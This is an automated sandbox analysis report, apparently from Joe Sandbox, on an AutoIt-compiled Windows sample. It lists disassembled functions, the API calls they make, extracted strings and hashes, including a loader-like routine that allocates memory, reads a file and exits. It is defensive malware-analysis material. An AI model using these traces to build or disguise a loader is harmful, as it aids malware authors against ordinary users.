                        • Part of subcall function 00ED91E9: __time64.LIBCMT ref: 00ED91F3
                        • Part of subcall function 00E75045: _fseek.LIBCMT ref: 00E7505D
                      • __wsplitpath.LIBCMT ref: 00ED94BE
                        • Part of subcall function 00E9432E: __wsplitpath_helper.LIBCMT ref: 00E9436E
                      • _wcscpy.LIBCMT ref: 00ED94D1
                      • _wcscat.LIBCMT ref: 00ED94E4
                      • __wsplitpath.LIBCMT ref: 00ED9509
                      • _wcscat.LIBCMT ref: 00ED951F
                      • _wcscat.LIBCMT ref: 00ED9532
                        • Part of subcall function 00ED922F: _memmove.LIBCMT ref: 00ED9268
                        • Part of subcall function 00ED922F: _memmove.LIBCMT ref: 00ED9277
                      • _wcscmp.LIBCMT ref: 00ED9479
                        • Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AAE
                        • Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AC1
                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ED96DC
                      • _wcsncpy.LIBCMT ref: 00ED974F
                      • DeleteFileW.KERNEL32(?,?), ref: 00ED9785
                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ED979B
                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED97AC
                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED97BE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                      • String ID:
                      • API String ID: 1500180987-0
                      • Opcode ID: db3c3cecd310d18abec2d8344f9c653e0214d27a3b902a2561e0a5bf62d246db
                      • Instruction ID: 7699e4e3aca10e86f840169b7945bb7079b7f4850cebe2bc187841a886f139be
                      • Opcode Fuzzy Hash: db3c3cecd310d18abec2d8344f9c653e0214d27a3b902a2561e0a5bf62d246db
                      • Instruction Fuzzy Hash: 2BC13AB1A00219AEDF21DFA5CC85ADEB7BDEF44304F0050ABF609F6252DB709A458F65

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00E73074
                      • RegisterClassExW.USER32(00000030), ref: 00E7309E
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E730AF
                      • InitCommonControlsEx.COMCTL32(?), ref: 00E730CC
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E730DC
                      • LoadIconW.USER32(000000A9), ref: 00E730F2
                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E73101
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                      • API String ID: 2914291525-1005189915
                      • Opcode ID: 6944b1e84e88360a527ec5a76e1f3d526333f489d818cae2302e287ab6a323f8
                      • Instruction ID: 7fb288f5673b7d38bdd978c0be6f1779cb9e3cc7cf13fd13588e0ba9ffee0366
                      • Opcode Fuzzy Hash: 6944b1e84e88360a527ec5a76e1f3d526333f489d818cae2302e287ab6a323f8
                      • Instruction Fuzzy Hash: F93137B1940309AFDB00DFA5EC85AEDBBF1FF09320F10852AE640E62A0D7B54585DF91

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00E73074
                      • RegisterClassExW.USER32(00000030), ref: 00E7309E
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E730AF
                      • InitCommonControlsEx.COMCTL32(?), ref: 00E730CC
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E730DC
                      • LoadIconW.USER32(000000A9), ref: 00E730F2
                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E73101
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                      • API String ID: 2914291525-1005189915
                      • Opcode ID: 8b11b46f2f132bd301ac84ef4a9d813926c39211f5d8838a3f365ab1d3db7aa3
                      • Instruction ID: 6109bfe1cc94c647332b866e1c08e0925d62037d2020fa2316996587a689331f
                      • Opcode Fuzzy Hash: 8b11b46f2f132bd301ac84ef4a9d813926c39211f5d8838a3f365ab1d3db7aa3
                      • Instruction Fuzzy Hash: 3221B4B1910218BFDB00DFA5E889AADBBF5FF08710F00812AFA10E62A0D7B14548DF95

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00E74864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F362F8,?,00E737C0,?), ref: 00E74882
                        • Part of subcall function 00E9074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E772C5), ref: 00E90771
                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E77308
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EAECF1
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EAED32
                      • RegCloseKey.ADVAPI32(?), ref: 00EAED70
                      • _wcscat.LIBCMT ref: 00EAEDC9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                      • API String ID: 2673923337-2727554177
                      • Opcode ID: a2bf4404fe5e6e119b6e4f5fbefc00046e08adc5f21d1247a4e3d911e129b3fc
                      • Instruction ID: 116d14316f78556d88a5766d42b493d2722d3f3a4c7fae5a203dfb13135aa68f
                      • Opcode Fuzzy Hash: a2bf4404fe5e6e119b6e4f5fbefc00046e08adc5f21d1247a4e3d911e129b3fc
                      • Instruction Fuzzy Hash: 48718FB15083059EC724EF65DC818ABB7E9FF89360F40552EF449A72A0DB70D948EF62

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00E73A62
                      • LoadCursorW.USER32(00000000,00007F00), ref: 00E73A71
                      • LoadIconW.USER32(00000063), ref: 00E73A88
                      • LoadIconW.USER32(000000A4), ref: 00E73A9A
                      • LoadIconW.USER32(000000A2), ref: 00E73AAC
                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E73AD2
                      • RegisterClassExW.USER32(?), ref: 00E73B28
                        • Part of subcall function 00E73041: GetSysColorBrush.USER32(0000000F), ref: 00E73074
                        • Part of subcall function 00E73041: RegisterClassExW.USER32(00000030), ref: 00E7309E
                        • Part of subcall function 00E73041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E730AF
                        • Part of subcall function 00E73041: InitCommonControlsEx.COMCTL32(?), ref: 00E730CC
                        • Part of subcall function 00E73041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E730DC
                        • Part of subcall function 00E73041: LoadIconW.USER32(000000A9), ref: 00E730F2
                        • Part of subcall function 00E73041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E73101
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                      • String ID: #$0$AutoIt v3
                      • API String ID: 423443420-4155596026
                      • Opcode ID: 4beebcdb7951195551895d3add8bd6e6dfd7237f09ba701e1fb762bc3ab10e41
                      • Instruction ID: 32cb0f9fde377914cb5b5f0c7fb0957c59ff6a57db8f4dde2488bd609477a990
                      • Opcode Fuzzy Hash: 4beebcdb7951195551895d3add8bd6e6dfd7237f09ba701e1fb762bc3ab10e41
                      • Instruction Fuzzy Hash: AB215C70910308BFEF109FA5EC09B9E7BB6EB48720F00812AE504B62A1C3B69554EF94

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 767 e73633-e73681 769 e73683-e73686 767->769 770 e736e1-e736e3 767->770 772 e736e7 769->772 773 e73688-e7368f 769->773 770->769 771 e736e5 770->771 774 e736ca-e736d2 DefWindowProcW 771->774 775 ead31c-ead34a call e811d0 call e811f3 772->775 776 e736ed-e736f0 772->776 777 e73695-e7369a 773->777 778 e7375d-e73765 PostQuitMessage 773->778 779 e736d8-e736de 774->779 811 ead34f-ead356 775->811 781 e73715-e7373c SetTimer RegisterWindowMessageW 776->781 782 e736f2-e736f3 776->782 783 ead38f-ead3a3 call ed2a16 777->783 784 e736a0-e736a2 777->784 780 e73711-e73713 778->780 780->779 781->780 789 e7373e-e73749 CreatePopupMenu 781->789 787 ead2bf-ead2c2 782->787 788 e736f9-e7370c KillTimer call e744cb call e73114 782->788 783->780 803 ead3a9 783->803 790 e73767-e73776 call e74531 784->790 791 e736a8-e736ad 784->791 796 ead2f8-ead317 MoveWindow 787->796 797 ead2c4-ead2c6 787->797 788->780 789->780 790->780 799 e736b3-e736b8 791->799 800 ead374-ead37b 791->800 796->780 806 ead2c8-ead2cb 797->806 807 ead2e7-ead2f3 SetFocus 797->807 801 e736be-e736c4 799->801 802 e7374b-e7375b call e745df 799->802 800->774 809 ead381-ead38a call ec817e 800->809 801->774 801->811 802->780 803->774 806->801 812 ead2d1-ead2e2 call e811d0 806->812 807->780 809->774 811->774 816 ead35c-ead36f call e744cb call e743db 811->816 812->780 816->774
                      APIs
                      • DefWindowProcW.USER32(?,?,?,?), ref: 00E736D2
                      • KillTimer.USER32(?,00000001), ref: 00E736FC
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E7371F
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E7372A
                      • CreatePopupMenu.USER32 ref: 00E7373E
                      • PostQuitMessage.USER32(00000000), ref: 00E7375F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                      • String ID: TaskbarCreated
                      • API String ID: 129472671-2362178303
                      • Opcode ID: d2fcac6d9283b3396f06714610a79fbf2956abe3f07a9e38859d863f7ad73057
                      • Instruction ID: 1e59d15232e9185409722a91b5207d92acfb8259b748f56f7823da11592a0152
                      • Opcode Fuzzy Hash: d2fcac6d9283b3396f06714610a79fbf2956abe3f07a9e38859d863f7ad73057
                      • Instruction Fuzzy Hash: 814127B1204109BBDF54AB74DC49BBA3795EB45310F14A12AF50AF62E2DB60EE04F761

                      Control-flow Graph

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                      • API String ID: 1825951767-3513169116
                      • Opcode ID: f59f40223865481e8e715af45213a4fc79cf905360882d7914cc58d67792b414
                      • Instruction ID: d8331f037464fc50ff4c39766894792de1b1a5f54f7e64b4c0c5b08d9dbd41dc
                      • Opcode Fuzzy Hash: f59f40223865481e8e715af45213a4fc79cf905360882d7914cc58d67792b414
                      • Instruction Fuzzy Hash: 05A1527191021DAADF04EBA0CC95DEEB7B8FF14310F44942AF41AB7192DF749A09DB61

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 952 1712690-171273e call 1710000 955 1712745-171276b call 17135a0 CreateFileW 952->955 958 1712772-1712782 955->958 959 171276d 955->959 967 1712784 958->967 968 1712789-17127a3 VirtualAlloc 958->968 960 17128bd-17128c1 959->960 961 1712903-1712906 960->961 962 17128c3-17128c7 960->962 964 1712909-1712910 961->964 965 17128d3-17128d7 962->965 966 17128c9-17128cc 962->966 969 1712912-171291d 964->969 970 1712965-171297a 964->970 971 17128e7-17128eb 965->971 972 17128d9-17128e3 965->972 966->965 967->960 973 17127a5 968->973 974 17127aa-17127c1 ReadFile 968->974 975 1712921-171292d 969->975 976 171291f 969->976 977 171298a-1712992 970->977 978 171297c-1712987 VirtualFree 970->978 979 17128fb 971->979 980 17128ed-17128f7 971->980 972->971 973->960 981 17127c3 974->981 982 17127c8-1712808 VirtualAlloc 974->982 985 1712941-171294d 975->985 986 171292f-171293f 975->986 976->970 978->977 979->961 980->979 981->960 983 171280a 982->983 984 171280f-171282a call 17137f0 982->984 983->960 992 1712835-171283f 984->992 989 171295a-1712960 985->989 990 171294f-1712958 985->990 988 1712963 986->988 988->964 989->988 990->988 993 1712841-1712870 call 17137f0 992->993 994 1712872-1712886 call 1713600 992->994 993->992 1000 1712888 994->1000 1001 171288a-171288e 994->1001 1000->960 1002 1712890-1712894 FindCloseChangeNotification 1001->1002 1003 171289a-171289e 1001->1003 1002->1003 1004 17128a0-17128ab VirtualFree 1003->1004 1005 17128ae-17128b7 1003->1005 1004->1005 1005->955 1005->960
                      APIs
                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01712761
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01712987
                      Memory Dump Source
                      • Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CreateFileFreeVirtual
                      • String ID:
                      • API String ID: 204039940-0
                      • Opcode ID: d148fe5d8863b416e5057870d6e1995944efe260b2a1982c94e468d18abf04d1
                      • Instruction ID: d65cc4ba8d4c7e7fbfa7c3193ed7efcc78990d9a0e6f2a5142cd709bb7a03654
                      • Opcode Fuzzy Hash: d148fe5d8863b416e5057870d6e1995944efe260b2a1982c94e468d18abf04d1
                      • Instruction Fuzzy Hash: 0AA10870E00209EBEB14CFA8C894BEEFBB5BF48704F208199E611BB285D7759A41CF54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1073 e739e7-e73a57 CreateWindowExW * 2 ShowWindow * 2
                      APIs
                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E73A15
                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E73A36
                      • ShowWindow.USER32(00000000,?,?), ref: 00E73A4A
                      • ShowWindow.USER32(00000000,?,?), ref: 00E73A53
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$CreateShow
                      • String ID: AutoIt v3$edit
                      • API String ID: 1584632944-3779509399
                      • Opcode ID: 4f630cd48d9897f704df224e3f07943aa83cf1902737f0a8cb106d8d7cafc3ef
                      • Instruction ID: 21006b3a961fcc4ca37d08d8feaebfd1399732121fecdd7f09ee4e26f4fd87ef
                      • Opcode Fuzzy Hash: 4f630cd48d9897f704df224e3f07943aa83cf1902737f0a8cb106d8d7cafc3ef
                      • Instruction Fuzzy Hash: D5F030706002987EEF301717AC09E373E7EDBC7F60B01802AF900E21B0C5A55810EA70

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1074 1712410-1712586 call 1710000 call 1712300 CreateFileW 1081 1712588 1074->1081 1082 171258d-171259d 1074->1082 1083 171263d-1712642 1081->1083 1085 17125a4-17125be VirtualAlloc 1082->1085 1086 171259f 1082->1086 1087 17125c0 1085->1087 1088 17125c2-17125d9 ReadFile 1085->1088 1086->1083 1087->1083 1089 17125db 1088->1089 1090 17125dd-1712617 call 1712340 call 1711300 1088->1090 1089->1083 1095 1712633-171263b ExitProcess 1090->1095 1096 1712619-171262e call 1712390 1090->1096 1095->1083 1096->1095
                      APIs
                        • Part of subcall function 01712300: Sleep.KERNELBASE(000001F4), ref: 01712311
                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01712579
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CreateFileSleep
                      • String ID: FA25CQJKP8I6RE83JQ7962JQL
                      • API String ID: 2694422964-3963497545
                      • Opcode ID: d84c5b14d7f60213af0bc3639faddc2543ead83fce9935419f8d0ca85afd47f3
                      • Instruction ID: 4410236feced41e74fe8cfa2573a0b11bdc0e03c6ab268ee756c6ca9b53ca96e
                      • Opcode Fuzzy Hash: d84c5b14d7f60213af0bc3639faddc2543ead83fce9935419f8d0ca85afd47f3
                      • Instruction Fuzzy Hash: 29618430D04248DAEF11DBA8C854BEEFB75AF19304F104199E649BB2C1D6BA4B45CBA6

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1098 e7410d-e74123 1099 e74200-e74204 1098->1099 1100 e74129-e7413e call e77b76 1098->1100 1103 e74144-e74164 call e77d2c 1100->1103 1104 ead5dd-ead5ec LoadStringW 1100->1104 1107 ead5f7-ead60f call e77c8e call e77143 1103->1107 1108 e7416a-e7416e 1103->1108 1104->1107 1117 e7417e-e741fb call e93020 call e7463e call e92ffc Shell_NotifyIconW call e75a64 1107->1117 1120 ead615-ead633 call e77e0b call e77143 call e77e0b 1107->1120 1110 e74205-e7420e call e781a7 1108->1110 1111 e74174-e74179 call e77c8e 1108->1111 1110->1117 1111->1117 1117->1099 1120->1117
                      APIs
                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EAD5EC
                        • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                      • _memset.LIBCMT ref: 00E7418D
                      • _wcscpy.LIBCMT ref: 00E741E1
                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E741F1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                      • String ID: Line:
                      • API String ID: 3942752672-1585850449
                      • Opcode ID: 9150675c17b891a00a2b00394d08dbc61a8d44d5332bcd66a824afb48d842b74
                      • Instruction ID: a209671f517f8739eca9c109f65f010f0a7bf23ac379cb33444d633033ac2354
                      • Opcode Fuzzy Hash: 9150675c17b891a00a2b00394d08dbc61a8d44d5332bcd66a824afb48d842b74
                      • Instruction Fuzzy Hash: 6231D171409304AADB22EB60EC46BDB77E8AF49314F10D51EF1D9B20E1EB74A648C793

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1133 e9564d-e95666 1134 e95668-e9566d 1133->1134 1135 e95683 1133->1135 1134->1135 1137 e9566f-e95671 1134->1137 1136 e95685-e9568b 1135->1136 1138 e9568c-e95691 1137->1138 1139 e95673-e95678 call e98d68 1137->1139 1141 e9569f-e956a3 1138->1141 1142 e95693-e9569d 1138->1142 1147 e9567e call e98ff6 1139->1147 1145 e956b3-e956b5 1141->1145 1146 e956a5-e956b0 call e93020 1141->1146 1142->1141 1144 e956c3-e956d2 1142->1144 1150 e956d9 1144->1150 1151 e956d4-e956d7 1144->1151 1145->1139 1149 e956b7-e956c1 1145->1149 1146->1145 1147->1135 1149->1139 1149->1144 1152 e956de-e956e3 1150->1152 1151->1152 1155 e956e9-e956f0 1152->1155 1156 e957cc-e957cf 1152->1156 1157 e95731-e95733 1155->1157 1158 e956f2-e956fa 1155->1158 1156->1136 1160 e9579d-e9579e call ea0df7 1157->1160 1161 e95735-e95737 1157->1161 1158->1157 1159 e956fc 1158->1159 1162 e957fa 1159->1162 1163 e95702-e95704 1159->1163 1172 e957a3-e957a7 1160->1172 1165 e95739-e95741 1161->1165 1166 e9575b-e95766 1161->1166 1171 e957fe-e95807 1162->1171 1169 e9570b-e95710 1163->1169 1170 e95706-e95708 1163->1170 1173 e95751-e95755 1165->1173 1174 e95743-e9574f 1165->1174 1167 e95768 1166->1167 1168 e9576a-e9576d 1166->1168 1167->1168 1176 e9576f-e9577b call e94916 call ea10ab 1168->1176 1177 e957d4-e957d8 1168->1177 1169->1177 1178 e95716-e9572f call ea0f18 1169->1178 1170->1169 1171->1136 1172->1171 1179 e957a9-e957ae 1172->1179 1175 e95757-e95759 1173->1175 1174->1175 1175->1168 1194 e95780-e95785 1176->1194 1181 e957ea-e957f5 call e98d68 1177->1181 1182 e957da-e957e7 call e93020 1177->1182 1193 e95792-e9579b 1178->1193 1179->1177 1180 e957b0-e957c1 1179->1180 1185 e957c4-e957c6 1180->1185 1181->1147 1182->1181 1185->1155 1185->1156 1193->1185 1195 e9578b-e9578e 1194->1195 1196 e9580c-e95810 1194->1196 1195->1162 1197 e95790 1195->1197 1196->1171 1197->1193
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                      • String ID:
                      • API String ID: 1559183368-0
                      • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                      • Instruction ID: f1b9c21b29e748ae59e0631ed1cb12cbfcc18e049ad432ebebe53aa9933e7566
                      • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                      • Instruction Fuzzy Hash: EA51B332A00B05DBDF268FB9C8846AE77B5AF41324F64972EF825B62D1D7709E518B40
                      APIs
                        • Part of subcall function 00E74F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74F6F
                      • _free.LIBCMT ref: 00EAE68C
                      • _free.LIBCMT ref: 00EAE6D3
